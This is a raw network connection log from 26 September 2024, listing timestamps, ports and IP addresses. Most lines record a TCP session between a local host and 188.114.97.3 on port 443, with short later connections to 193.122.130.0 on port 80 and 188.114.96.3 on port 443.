Sep 26, 2024 09:23:22.097908020 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097912073 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.097939968 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097958088 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.098484993 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.098520041 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.098541021 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.098546028 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.098572969 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.098588943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099097013 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099123955 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099153996 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099159956 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099185944 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099205017 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099674940 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099706888 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099740028 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099745035 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099771023 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099786997 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.099956989 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.099986076 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.100013018 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.100018024 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.100055933 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.100055933 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.117187977 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.188822031 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.188863039 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.188981056 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189001083 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189042091 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189225912 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189245939 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189275980 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189280987 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189308882 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189327955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189858913 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189878941 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189918041 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189923048 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.189950943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.189968109 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.190392017 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.190409899 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.190452099 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.190458059 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.190489054 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.190974951 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.190992117 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.191023111 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.191028118 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.191076994 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.191447020 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.191473961 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.191493988 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.191493988 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.191499949 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.191524982 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.191555023 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192003965 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192023039 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192053080 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192056894 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192085028 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192085981 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192604065 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192625999 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192655087 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192660093 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.192681074 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192714930 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.192714930 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.281529903 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.281569004 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.281663895 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.281697989 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.281718016 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.281744003 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.281975031 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.281991959 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.282036066 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.282042027 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.282073975 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.282090902 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.282583952 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.282601118 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.282660007 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.282668114 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.282708883 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.283155918 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283173084 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283217907 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.283224106 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283252954 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.283265114 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.283876896 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283900976 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283947945 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.283955097 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.283984900 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.284001112 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.284216881 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284235001 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284286976 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.284293890 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284338951 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.284888029 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284908056 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284950972 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.284956932 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.284984112 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.285006046 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.285289049 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.285311937 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.285357952 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.285363913 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.285393953 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.285403967 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.374162912 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374195099 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374290943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.374305964 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374352932 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.374589920 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374607086 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374651909 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.374658108 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.374691010 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375158072 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375174046 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375211000 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375216961 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375241041 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375257015 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375439882 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375457048 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375492096 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375497103 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.375520945 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.375536919 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376216888 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376231909 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376271963 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376276970 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376300097 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376321077 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376537085 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376552105 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376589060 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376595020 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.376617908 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.376631975 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377310991 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377329111 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377362967 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377379894 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377392054 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377420902 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377892971 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377907991 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377947092 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377953053 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.377974987 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.377995968 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.467554092 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467578888 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467668056 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.467684984 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467726946 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.467853069 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467868090 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467899084 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.467905045 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.467931986 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.467951059 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.468215942 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468230963 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468283892 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.468290091 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468322992 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.468579054 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468590975 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468656063 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.468662024 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468698025 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.468945980 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.468964100 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469028950 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469033957 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469069004 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469512939 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469538927 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469577074 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469583988 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469597101 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469615936 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469871998 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469887018 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469935894 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.469942093 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.469978094 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.470855951 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.470870972 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.470922947 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.470928907 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.470963955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559525013 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559601068 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559684992 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559712887 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559747934 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559762955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559844017 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559871912 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559906960 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559915066 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.559937000 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.559957981 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.560478926 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.560493946 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.560544014 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.560551882 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.560592890 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.560966969 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.560983896 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561028957 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561034918 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561059952 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561079979 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561602116 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561616898 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561655998 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561662912 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561686993 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561706066 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561917067 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561933041 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561969995 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.561975002 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.561999083 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.562016010 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.562711000 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.562732935 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.562767029 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.562772989 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.562798023 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.562813997 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.563299894 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.563318014 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.563357115 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.563363075 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.563411951 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.563411951 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.652157068 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652187109 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652400970 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.652420998 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652471066 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.652599096 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652616024 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652676105 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.652683020 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.652695894 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.652731895 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.653105021 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653124094 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653178930 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.653187037 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653209925 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.653233051 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.653732061 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653747082 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653795958 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.653804064 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.653841972 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.654323101 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.654359102 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.654401064 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.654407978 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.654436111 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.654459953 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.654928923 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.654944897 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.654994011 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.654999971 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.655014992 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.655046940 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.655421019 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.655437946 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.655494928 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.655503035 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.655545950 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.656053066 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.656068087 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.656121969 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.656130075 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.656176090 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.744834900 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.744890928 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.744951010 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.744965076 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.744992971 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.745009899 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.745126963 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.745193005 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.745198965 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.745242119 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.745292902 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.745342016 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.746695995 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:24:07.496129990 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:07.501146078 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:07.501265049 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:07.501533985 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:07.506416082 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:07.957529068 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:07.962793112 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:07.967720032 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:08.067563057 CEST	80	49721	193.122.130.0	192.168.2.6
Sep 26, 2024 09:24:08.103247881 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.103281975 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.104872942 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.109081030 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.109096050 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.120100975 CEST	49721	80	192.168.2.6	193.122.130.0
Sep 26, 2024 09:24:08.583930016 CEST	443	49722	188.114.96.3	192.168.2.6
Sep 26, 2024 09:24:08.584002972 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.586654902 CEST	49722	443	192.168.2.6	188.114.96.3
Sep 26, 2024 09:24:08.586666107 CEST	443	49722	188.114.96.3	192.168.2.6
